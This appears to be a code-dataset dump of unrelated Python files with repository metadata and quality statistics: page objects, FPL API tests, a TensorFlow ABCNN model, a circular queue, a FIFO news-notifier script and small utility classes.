self.q(css='button.btn').click()
GitHubSearchResultsPage(self.browser).wait_for_page()
def search_for_terms(self, text):
"""
Fill in the search terms and click the
Search button
"""
self.enter_search_terms(text)
self.search()
| 23.864407 | 72 | 0.598722 | 181 | 1,408 | 4.563536 | 0.392265 | 0.024213 | 0.038741 | 0.05569 | 0.094431 | 0.053269 | 0 | 0 | 0 | 0 | 0 | 0.001 | 0.289773 | 1,408 | 58 | 73 | 24.275862 | 0.823 | 0.226563 | 0 | 0.086957 | 0 | 0 | 0.142405 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.26087 | false | 0 | 0.086957 | 0.043478 | 0.652174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a474695a184b6ecb573b77e69e9665b729d6878 | 274 | py | Python | class-1/read_jy.py | dyrbrm/pynet-test | 78c600c35865810403ce6a4901635796fe22c65d | [
"Apache-2.0"
] | null | null | null | class-1/read_jy.py | dyrbrm/pynet-test | 78c600c35865810403ce6a4901635796fe22c65d | [
"Apache-2.0"
] | null | null | null | class-1/read_jy.py | dyrbrm/pynet-test | 78c600c35865810403ce6a4901635796fe22c65d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import yaml
import json
import pprint
with open("yaml_file.yml") as f:
new_yaml_list = yaml.load(f)
with open("json_file.json") as f:
new_json_list = json.load(f)
print "yaml file="
print new_yaml_list
print "json file="
print new_json_list
| 15.222222 | 33 | 0.729927 | 50 | 274 | 3.8 | 0.36 | 0.084211 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156934 | 274 | 17 | 34 | 16.117647 | 0.822511 | 0.072993 | 0 | 0 | 0 | 0 | 0.185771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.272727 | null | null | 0.454545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
0a47e53aa0f05efdfe599cfbcb851b13b9ec0821 | 1,553 | py | Python | scripts/hello.py | LukeB42/Emissary | 31629a8baedc91a9b60c551a01b2b45372b9a8c7 | [
"MIT"
] | 193 | 2015-06-20T23:46:05.000Z | 2021-02-16T14:04:29.000Z | scripts/hello.py | LukeB42/Emissary | 31629a8baedc91a9b60c551a01b2b45372b9a8c7 | [
"MIT"
] | 4 | 2015-08-23T15:25:55.000Z | 2016-01-06T11:29:20.000Z | scripts/hello.py | LukeB42/Emissary | 31629a8baedc91a9b60c551a01b2b45372b9a8c7 | [
"MIT"
] | 21 | 2015-07-05T12:20:06.000Z | 2019-07-12T08:07:46.000Z | # _*_ coding: utf-8 _*_
#
# This script creates a named pipe (if it doesn't exist)
# and writes the feed name, article title and url to it
# whenever an article is saved to the database.
#
# This is useful for composing systems that constantly read
# the FIFO and do things like emit the data to IRC channels.
#
# You could, for instance, perform fuzzy pattern matching and be
# notified when certain keywords are in the news.
#
# Transmission to a natural language processing/translation service
# can also be done in a script or by reading a FIFO like the one here.
#
# Whether you use this system to profit, perform intelligence analysis
# or inform your next vote is hopefully up to you!
#
# Luke Brooks, 2015
# MIT License
# Many big thanks to God, lord of universes.
fifo = "/tmp/emissary.pipe"
import os, stat
if not os.path.exists(fifo):
try:
os.mkfifo(fifo)
except Exception, e:
cache['app'].log("Error creating %s: %s" % (fifo, e.message))
# Emissary always executes scripts with an article and its feed in the namespace.
# There is also a dictionary named cache, containing the app object.
# Random aside but through the app object you can access the logging interface and the feed manager.
try:
# READER BEWARE: Use non-blocking IO or you won't be storing owt.
fd = os.open(fifo, os.O_CREAT | os.O_WRONLY | os.O_NONBLOCK)
os.write(fd, "%s: %s\n%s\n" % (feed.name, article.title, article.url))
os.close(fd)
del fd
except Exception, e: # Usually due to there not being a reader fd known to the kernel.
pass
del os, stat, fifo
| 34.511111 | 100 | 0.734707 | 267 | 1,553 | 4.247191 | 0.59176 | 0.007937 | 0.026455 | 0.035273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00394 | 0.182872 | 1,553 | 44 | 101 | 35.295455 | 0.889677 | 0.711526 | 0 | 0.266667 | 0 | 0 | 0.128266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.066667 | 0.066667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a4a0500f1dddd3758d7f1fa378436097042faf6 | 708 | py | Python | projects/model/Category.py | chamathshashika/projects-python-wrappers | 33e9f6bccba16a581b115c582033a93d43bb159c | [
"MIT"
] | null | null | null | projects/model/Category.py | chamathshashika/projects-python-wrappers | 33e9f6bccba16a581b115c582033a93d43bb159c | [
"MIT"
] | null | null | null | projects/model/Category.py | chamathshashika/projects-python-wrappers | 33e9f6bccba16a581b115c582033a93d43bb159c | [
"MIT"
] | null | null | null | #$Id$
class Category:
"""This class is used to create object for category."""
def __init__(self):
"""Initialize parameters for Category."""
self.id = ""
self.name = ""
def set_id(self, id):
"""Set id.
Args:
id(str): Id.
"""
self.id = id
def get_id(self):
"""Get id.
Returns:
str: Id.
"""
return self.id
def set_name(self, name):
"""Set name.
Args:
name(str): name.
"""
self.name = name
def get_name(self):
"""Get name.
Returns:
str: name.
"""
return self.name
| 14.75 | 59 | 0.422316 | 75 | 708 | 3.88 | 0.293333 | 0.082474 | 0.054983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.446328 | 708 | 47 | 60 | 15.06383 | 0.742347 | 0.319209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.416667 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a504b996b74490d0636022a43cc0bfd844c58ea | 559 | py | Python | src/squirrel/shared/setupsql.py | bvz2000/squirrel | 5d3ba00825aaa5337d8972a0edc6530230a8a754 | [
"Unlicense"
] | null | null | null | src/squirrel/shared/setupsql.py | bvz2000/squirrel | 5d3ba00825aaa5337d8972a0edc6530230a8a754 | [
"Unlicense"
] | null | null | null | src/squirrel/shared/setupsql.py | bvz2000/squirrel | 5d3ba00825aaa5337d8972a0edc6530230a8a754 | [
"Unlicense"
] | null | null | null | import inspect
import configparser
import os.path
# ----------------------------------------------------------------------------------------------------------------------
def create_sql_object():
"""
Create a sql resources object.
:return:
A sql resources object.
"""
module_d = os.path.split(inspect.stack()[0][1])[0]
resources_d = os.path.abspath(os.path.join(module_d, "..", "..", "..", "resources"))
parser = configparser.ConfigParser()
parser.read(os.path.join(resources_d, "sql.ini"))
return parser
| 25.409091 | 120 | 0.495528 | 56 | 559 | 4.839286 | 0.410714 | 0.110701 | 0.095941 | 0.140221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006438 | 0.166369 | 559 | 21 | 121 | 26.619048 | 0.575107 | 0.34347 | 0 | 0 | 0 | 0 | 0.06414 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0a52886cde79896f927dd3511458959a850855fa | 2,453 | py | Python | tests/test_fpl.py | emre/fpl | 381f37f381a6de23537e236788352c48a37a6005 | [
"MIT"
] | null | null | null | tests/test_fpl.py | emre/fpl | 381f37f381a6de23537e236788352c48a37a6005 | [
"MIT"
] | null | null | null | tests/test_fpl.py | emre/fpl | 381f37f381a6de23537e236788352c48a37a6005 | [
"MIT"
] | 1 | 2019-10-17T15:56:43.000Z | 2019-10-17T15:56:43.000Z | import unittest
from fpl import FPL
from fpl.models.classic_league import ClassicLeague
from fpl.models.fixture import Fixture
from fpl.models.gameweek import Gameweek
from fpl.models.h2h_league import H2HLeague
from fpl.models.player import Player
from fpl.models.team import Team
from fpl.models.user import User
class FPLTest(unittest.TestCase):
def setUp(self):
self.fpl = FPL()
def test_user(self):
user = self.fpl.get_user("3523615")
self.assertIsInstance(user, User)
def test_team(self):
team = self.fpl.get_team(1)
self.assertIsInstance(team, Team)
def test_teams(self):
teams = self.fpl.get_teams()
self.assertIsInstance(teams, list)
self.assertEqual(len(teams), 20)
self.assertIsInstance(teams[0], Team)
def test_player(self):
player = self.fpl.get_player(1)
self.assertIsInstance(player, Player)
def test_players(self):
players = self.fpl.get_players()
self.assertIsInstance(players, list)
self.assertIsInstance(players[0], Player)
def test_fixture(self):
fixture = self.fpl.get_fixture(6)
self.assertIsInstance(fixture, Fixture)
fixture = self.fpl.get_fixture(6, gameweek=1)
self.assertIsInstance(fixture, Fixture)
def test_fixtures(self):
fixtures = self.fpl.get_fixtures()
self.assertIsInstance(fixtures, list)
self.assertIsInstance(fixtures[0], Fixture)
fixtures = self.fpl.get_fixtures(gameweek=1)
self.assertEqual(len(fixtures), 10)
self.assertIsInstance(fixtures, list)
self.assertIsInstance(fixtures[0], Fixture)
def test_gameweeks(self):
gameweeks = self.fpl.get_gameweeks()
self.assertIsInstance(gameweeks, list)
self.assertEqual(len(gameweeks), 38)
def test_gameweek(self):
gameweek = self.fpl.get_gameweek("20")
self.assertIsInstance(gameweek, Gameweek)
def test_game_settings(self):
game_settings = self.fpl.game_settings()
self.assertIsInstance(game_settings, dict)
def test_classic_league(self):
classic_league = self.fpl.get_classic_league("890172")
self.assertIsInstance(classic_league, ClassicLeague)
def test_h2h_league(self):
h2h_league = self.fpl.get_h2h_league("760869")
self.assertIsInstance(h2h_league, H2HLeague)
if __name__ == '__main__':
unittest.main()
| 31.050633 | 62 | 0.688545 | 297 | 2,453 | 5.52862 | 0.154882 | 0.219245 | 0.079172 | 0.026797 | 0.144945 | 0.113276 | 0.082826 | 0.082826 | 0.082826 | 0 | 0 | 0.022716 | 0.210355 | 2,453 | 78 | 63 | 31.448718 | 0.824987 | 0 | 0 | 0.098361 | 0 | 0 | 0.011822 | 0 | 0 | 0 | 0 | 0 | 0.344262 | 1 | 0.213115 | false | 0 | 0.147541 | 0 | 0.377049 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a65092c7c6e37e2cdd113eb9f101a48760170fb | 13,940 | py | Python | abcnn.py | ameyagodbole/ABCNN-tensorflow | 9b3a6911982b930ed852362af35208208760eb19 | [
"MIT"
] | 4 | 2018-10-29T04:11:19.000Z | 2019-12-19T04:42:25.000Z | abcnn.py | ameyagodbole/ABCNN-tensorflow | 9b3a6911982b930ed852362af35208208760eb19 | [
"MIT"
] | null | null | null | abcnn.py | ameyagodbole/ABCNN-tensorflow | 9b3a6911982b930ed852362af35208208760eb19 | [
"MIT"
] | 3 | 2018-12-08T22:39:04.000Z | 2020-04-08T09:34:37.000Z | """
An implementation of ABCNN from
ABCNN: Attention-Based Convolutional Neural Network for Modeling Sentence Pairs
Yin, W.; Schutze, H.; Xiang, B.; and Zhou, B.
"""
import tensorflow as tf
import numpy as np
'''
Each config should be a dictionary with entries:
type : Type pf convolutional layer depending of use of attenion map; one of BCNN, ABCNN-1, ABCNN-2, ABCNN-3
w : Width of convolutional kernel
n : Number of convolutional ops
nl : Type of non-linearity; one of 'tanh' or 'relu'
'''
DEFAULT_CONFIG = [{'type':'ABCNN-3','w':3, 'n':50, 'nl':'tanh'} for _ in range(3)]
class ABCNN:
def __init__(self, conv_layers, embed_size, sentence_len, external_measures = 0, config = DEFAULT_CONFIG):
self.conv_layers = conv_layers
self.embed_size = embed_size
self.sentence_len = sentence_len
self.external_measures = external_measures
self.config = config
print 'ABCNN params initialised'
def _conv_layer(self, config, input):
kernel = tf.get_variable('kernel', [input.get_shape()[1], config['w'], input.get_shape()[3], config['n']], initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
conv = tf.nn.conv2d(input, kernel, strides=[1, 1, 1, 1], padding='VALID')
biases = tf.get_variable("biases", config['n'], dtype=tf.float32, initializer=tf.constant_initializer(0.0))
if config['nl'] == 'tanh':
nl = tf.nn.tanh
elif config['nl'] == 'relu':
nl = tf.nn.relu
else:
raise ValueError('_conv_layer: %s is not implemented' % config['nl'])
return nl(conv + biases)
def _add_BCNN(self, id, config, last, layer_input):
scope_name = 'BCNN_'+str(id)
with tf.variable_scope(scope_name,initializer=tf.contrib.layers.xavier_initializer()) as scope:
with tf.variable_scope('conv') as scope:
padded_in1 = tf.pad(layer_input[0], [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
padded_in2 = tf.pad(layer_input[1], [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
conv1 = self._conv_layer(config, padded_in1)
scope.reuse_variables()
conv2 = self._conv_layer(config, padded_in2)
if last:
with tf.variable_scope('all-ap') as scope:
ap1 = tf.reduce_mean(conv1, axis=[1,2])
ap2 = tf.reduce_mean(conv2, axis=[1,2])
return ap1, ap2
else:
with tf.variable_scope('%d-ap' % config['w']) as scope:
avg_pool1 = tf.nn.avg_pool(conv1,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool1')
avg_pool2 = tf.nn.avg_pool(conv2,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool2')
ap1 = tf.transpose(avg_pool1, perm=[0,3,2,1], name='ap1')
ap2 = tf.transpose(avg_pool2, perm=[0,3,2,1], name='ap2')
return ap1, ap2
def _add_ABCNN_1(self, id, config, last, layer_input):
scope_name = 'ABCNN1_'+str(id)
with tf.variable_scope(scope_name,initializer=tf.contrib.layers.xavier_initializer()) as scope:
with tf.variable_scope('similarity') as scope:
tile_in1 = tf.tile(layer_input[0],[1, 1, 1, layer_input[1].get_shape().as_list()[2]],name='tile1')
tile_in2 = tf.transpose(layer_input[1],[0, 1, 3, 2],name='tile2')
sq_dist = tf.squared_difference(tile_in1, tile_in2 ,name='sq_dist')
pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1] ),name='pair_dist')
similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0,dtype=tf.float32,name='one')),name='similarity')
with tf.variable_scope('attention') as scope:
W = tf.get_variable('W', [1,layer_input[0].get_shape()[1],layer_input[0].get_shape()[2]],initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
W_tiled = tf.tile(W,[layer_input[0].get_shape().as_list()[0],1,1])
A1 = tf.matmul(W_tiled, tf.transpose(similarity,[0,2,1]),name='attention_map1')
A2 = tf.matmul(W_tiled, similarity,name='attention_map2')
with tf.variable_scope('conv') as scope:
layer_in1 = tf.concat([layer_input[0],tf.expand_dims(A1, -1)],axis=3)
layer_in2 = tf.concat([layer_input[1],tf.expand_dims(A2, -1)],axis=3)
padded_in1 = tf.pad(layer_in1, [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
padded_in2 = tf.pad(layer_in2, [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
conv1 = self._conv_layer(config, padded_in1)
scope.reuse_variables()
conv2 = self._conv_layer(config, padded_in2)
if last:
with tf.variable_scope('all-ap') as scope:
ap1 = tf.reduce_mean(conv1, axis=[1,2])
ap2 = tf.reduce_mean(conv2, axis=[1,2])
return ap1, ap2
else:
with tf.variable_scope('%d-ap' % config['w']) as scope:
avg_pool1 = tf.nn.avg_pool(conv1,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool1')
avg_pool2 = tf.nn.avg_pool(conv2,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool2')
ap1 = tf.transpose(avg_pool1, perm=[0,3,2,1], name='ap1')
ap2 = tf.transpose(avg_pool2, perm=[0,3,2,1], name='ap2')
return ap1, ap2
def _add_ABCNN_2(self, id, config, last, layer_input):
scope_name = 'ABCNN2_'+str(id)
with tf.variable_scope(scope_name,initializer=tf.contrib.layers.xavier_initializer()) as scope:
with tf.variable_scope('conv') as scope:
padded_in1 = tf.pad(layer_input[0], [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
padded_in2 = tf.pad(layer_input[1], [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
conv1 = self._conv_layer(config, padded_in1)
scope.reuse_variables()
conv2 = self._conv_layer(config, padded_in2)
with tf.variable_scope('similarity') as scope:
conv1t = tf.transpose(conv1, [0,3,2,1], name='conv1t')
conv2t = tf.transpose(conv2, [0,3,2,1], name='conv2t')
tile_out1 = tf.tile(conv1t,[1, 1, 1, conv2.get_shape().as_list()[2]],name='tile1')
tile_out2 = tf.transpose(conv2t,[0, 1, 3, 2],name='tile2')
sq_dist = tf.squared_difference(tile_out1, tile_out2 ,name='sq_dist')
pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1] ),name='pair_dist')
similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0,dtype=tf.float32,name='one')),name='similarity')
with tf.variable_scope('attention') as scope:
A1 = tf.reduce_sum(similarity, axis=[2], name='attention_map1')
A2 = tf.reduce_sum(similarity, axis=[1], name='attention_map2')
A1e = tf.expand_dims(A1, 1)
A2e = tf.expand_dims(A2, 1)
A1f = tf.expand_dims(A1e, -1)
A2f = tf.expand_dims(A2e, -1)
conv1w = tf.multiply(conv1t, A1f, name='weighted_conv1')
conv2w = tf.multiply(conv2t, A2f, name='weighted_conv2')
if last:
with tf.variable_scope('all-ap') as scope:
ap1 = tf.reduce_mean(conv1w, axis=[2,3])
ap2 = tf.reduce_mean(conv2w, axis=[2,3])
return ap1, ap2
else:
with tf.variable_scope('%d-ap' % config['w']) as scope:
avg_pool1 = tf.nn.avg_pool(conv1w,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool1')
avg_pool2 = tf.nn.avg_pool(conv2w,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool2')
return avg_pool1, avg_pool2
def _add_ABCNN_3(self, id, config, last, layer_input):
scope_name = 'ABCNN3_'+str(id)
with tf.variable_scope(scope_name,initializer=tf.contrib.layers.xavier_initializer()) as scope:
with tf.variable_scope('similarity_pre') as scope:
tile_in1 = tf.tile(layer_input[0],[1, 1, 1, layer_input[1].get_shape().as_list()[2]],name='tile1')
tile_in2 = tf.transpose(layer_input[1],[0, 1, 3, 2],name='tile2')
sq_dist = tf.squared_difference(tile_in1, tile_in2 ,name='sq_dist')
pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1] ),name='pair_dist')
similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0,dtype=tf.float32,name='one')),name='similarity')
with tf.variable_scope('attention_pre') as scope:
W = tf.get_variable('W', [1,layer_input[0].get_shape()[1],layer_input[0].get_shape()[2]],initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
W_tiled = tf.tile(W,[layer_input[0].get_shape().as_list()[0],1,1])
A1 = tf.matmul(W_tiled, tf.transpose(similarity,[0,2,1]),name='attention_map1')
A2 = tf.matmul(W_tiled, similarity,name='attention_map2')
with tf.variable_scope('conv') as scope:
layer_in1 = tf.concat([layer_input[0],tf.expand_dims(A1, -1)],axis=3)
layer_in2 = tf.concat([layer_input[1],tf.expand_dims(A2, -1)],axis=3)
padded_in1 = tf.pad(layer_in1, [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
padded_in2 = tf.pad(layer_in2, [[0,0],[0,0],[config['w']-1,config['w']-1],[0,0]], 'constant')
conv1 = self._conv_layer(config, padded_in1)
scope.reuse_variables()
conv2 = self._conv_layer(config, padded_in2)
with tf.variable_scope('similarity_post') as scope:
conv1t = tf.transpose(conv1, [0,3,2,1], name='conv1t')
conv2t = tf.transpose(conv2, [0,3,2,1], name='conv2t')
tile_out1 = tf.tile(conv1t,[1, 1, 1, conv2.get_shape().as_list()[2]],name='tile1')
tile_out2 = tf.transpose(conv2t,[0, 1, 3, 2],name='tile2')
sq_dist = tf.squared_difference(tile_out1, tile_out2 ,name='sq_dist')
pair_dist = tf.sqrt(tf.reduce_sum(sq_dist, axis=[1] ),name='pair_dist')
similarity = tf.reciprocal(tf.add(pair_dist, tf.constant(1.0,dtype=tf.float32,name='one')),name='similarity')
with tf.variable_scope('attention_post') as scope:
A1 = tf.reduce_sum(similarity, axis=[2], name='attention_map1')
A2 = tf.reduce_sum(similarity, axis=[1], name='attention_map2')
A1e = tf.expand_dims(A1, 1)
A2e = tf.expand_dims(A2, 1)
A1f = tf.expand_dims(A1e, -1)
A2f = tf.expand_dims(A2e, -1)
conv1w = tf.multiply(conv1t, A1f, name='weighted_conv1')
conv2w = tf.multiply(conv2t, A2f, name='weighted_conv2')
if last:
with tf.variable_scope('all-ap') as scope:
ap1 = tf.reduce_mean(conv1w, axis=[2,3])
ap2 = tf.reduce_mean(conv2w, axis=[2,3])
return ap1, ap2
else:
with tf.variable_scope('%d-ap' % config['w']) as scope:
avg_pool1 = tf.nn.avg_pool(conv1w,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool1')
avg_pool2 = tf.nn.avg_pool(conv2w,[1,1,config['w'],1],strides=[1,1,1,1],padding="VALID",name='avg_pool2')
return avg_pool1, avg_pool2
def build_graph(self, embed_matrix, train_embed_matrix, batch_size):
print 'Building graph...'
self.global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
with tf.name_scope("data"):
# self.in1 = tf.placeholder(tf.int32, shape=None, name='in1')
# self.in2 = tf.placeholder(tf.int32, shape=None, name='in2')
self.in1 = tf.placeholder(tf.int32, shape=[batch_size, self.sentence_len], name='in1')
self.in2 = tf.placeholder(tf.int32, shape=[batch_size, self.sentence_len], name='in2')
if self.external_measures > 0:
self.ext = tf.placeholder(tf.float32, shape=[batch_size, self.external_measures], name='ext_measure')
self.target = tf.placeholder(tf.float32, shape=[batch_size], name='target')
with tf.variable_scope('embedding') as scope:
embedding_weights = tf.Variable(initial_value = embed_matrix, dtype = tf.float32, trainable=train_embed_matrix, name = 'embedding_weights')
# self.q1 = tf.nn.embedding_lookup(embedding_weights, self.in1, name='embed_q1')
# scope.reuse_variables()
# self.q2 = tf.nn.embedding_lookup(embedding_weights, self.in2, name='embed_q2')
eq1 = tf.nn.embedding_lookup(embedding_weights, self.in1)
eq2 = tf.nn.embedding_lookup(embedding_weights, self.in2)
tq1 = tf.transpose(eq1, [0,2,1], name='t_q1')
tq2 = tf.transpose(eq2, [0,2,1], name='t_q2')
self.q1 = tf.expand_dims(tq1, -1, name='q1')
self.q2 = tf.expand_dims(tq2, -1, name='q2')
layer_input = [self.q1, self.q2]
for i in range(self.conv_layers):
last = (i == self.conv_layers - 1)
if self.config[i]['type'] == 'ABCNN-3':
layer_input = self._add_ABCNN_3(i, self.config[i], last, layer_input)
continue
if self.config[i]['type'] == 'ABCNN-2':
layer_input = self._add_ABCNN_2(i, self.config[i], last, layer_input)
continue
if self.config[i]['type'] == 'ABCNN-1':
layer_input = self._add_ABCNN_1(i, self.config[i], last, layer_input)
continue
if self.config[i]['type'] == 'BCNN':
layer_input = self._add_BCNN(i, self.config[i], last, layer_input)
continue
else:
raise ValueError('Unrecognised conv layer type')
with tf.variable_scope('fc') as scope:
if self.external_measures > 0:
fc_in = tf.concat([layer_input[0],layer_input[1],self.ext],axis=1)
else:
fc_in = tf.concat([layer_input[0],layer_input[1]],axis=1)
w = tf.Variable(tf.truncated_normal([fc_in.get_shape().as_list()[1],1], stddev=0.1, dtype=tf.float32), name='weights')
b = tf.Variable(tf.zeros([1], dtype=tf.float32), name="bias")
logit_r = tf.matmul(fc_in, w) + b
logits = tf.reshape(logit_r, [-1])
with tf.name_scope('loss'):
self.cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.target))
optimizer = tf.train.AdamOptimizer()
self.train_step = optimizer.minimize(self.cross_entropy, global_step= self.global_step, name='train_step')
with tf.name_scope('prediction'):
self.prediction = tf.round(tf.sigmoid(logits), name='prediction')
correct_prediction = tf.equal(self.prediction, self.target)
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')
with tf.name_scope("summaries"):
tf.summary.scalar("loss", self.cross_entropy)
tf.summary.scalar("accuracy", self.accuracy)
tf.summary.histogram("histogram_loss", self.cross_entropy)
self.summary_op = tf.summary.merge_all()
self.init_op = tf.group(tf.global_variables_initializer(),tf.local_variables_initializer())
print 'Done'
if __name__ == '__main__':
c = ABCNN(conv_layers=3, embed_size=50, sentence_len=40)
c.build_graph(np.random.randn(20,50), 1, 128)
with tf.Session() as sess:
sess.run( c.init_op )
writer = tf.summary.FileWriter('./graph', sess.graph)
writer.close() | 49.964158 | 178 | 0.683788 | 2,285 | 13,940 | 3.992123 | 0.108972 | 0.010086 | 0.039904 | 0.054155 | 0.714427 | 0.68724 | 0.684828 | 0.668823 | 0.631331 | 0.619711 | 0 | 0.049719 | 0.132855 | 13,940 | 279 | 179 | 49.964158 | 0.704914 | 0.021593 | 0 | 0.603524 | 0 | 0 | 0.085558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008811 | null | null | 0.013216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a670defa7960780745a3904c44171ded53a13e6 | 1,414 | py | Python | coding_interview/25.py | smartx-jshan/Coding_Practice | bc7d485e7992031e55df62483818b721ad7d1d4f | [
"Apache-2.0"
] | null | null | null | coding_interview/25.py | smartx-jshan/Coding_Practice | bc7d485e7992031e55df62483818b721ad7d1d4f | [
"Apache-2.0"
] | null | null | null | coding_interview/25.py | smartx-jshan/Coding_Practice | bc7d485e7992031e55df62483818b721ad7d1d4f | [
"Apache-2.0"
] | null | null | null | class MyCircularQueue:
def __init__(self, k: int):
self.q = [None] * k
self.maxlen = k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.q[self.rear] is None:
self.q[self.rear] = value
self.rear = (self.rear + 1 ) % self.maxlen
return True
return False
def deQueue(self) -> bool:
if self.front == self.rear and self.q[self.front] is None:
return False
self.q[self.front] = None
self.front = (self.front +1) % self.maxlen
return True
def Front(self) -> int:
if self.q[self.front] is None:
return -1
return self.q[self.front]
def Rear(self) -> int:
if self.q[self.rear -1] is None:
return -1
return self.q[self.rear-1]
def isEmpty(self) -> bool:
if self.front == self.rear and self.q[self.rear] is None:
return True
return False
def isFull(self) -> bool:
if self.front == self.rear and self.q[self.rear] is not None:
return True
return False
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
# param_4 = obj.Rear()
# param_5 = obj.isEmpty()
# param_6 = obj.isFull()
| 26.185185 | 70 | 0.556577 | 198 | 1,414 | 3.924242 | 0.212121 | 0.123552 | 0.11583 | 0.100386 | 0.492921 | 0.342342 | 0.277992 | 0.238095 | 0.166023 | 0.166023 | 0 | 0.014706 | 0.326733 | 1,414 | 53 | 71 | 26.679245 | 0.801471 | 0.166902 | 0 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0 | 0 | 0 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a6d647cd6903b084fbe8153fe0edee421c4615e | 442 | py | Python | django/docs/releases/1.11.28.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | django/docs/releases/1.11.28.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | django/docs/releases/1.11.28.txt.py | roshanba/mangal | f7b428811dc07214009cc33f0beb665ead402038 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | XXXXXXXXXXXXXXXXXXXXXXXXXXXX
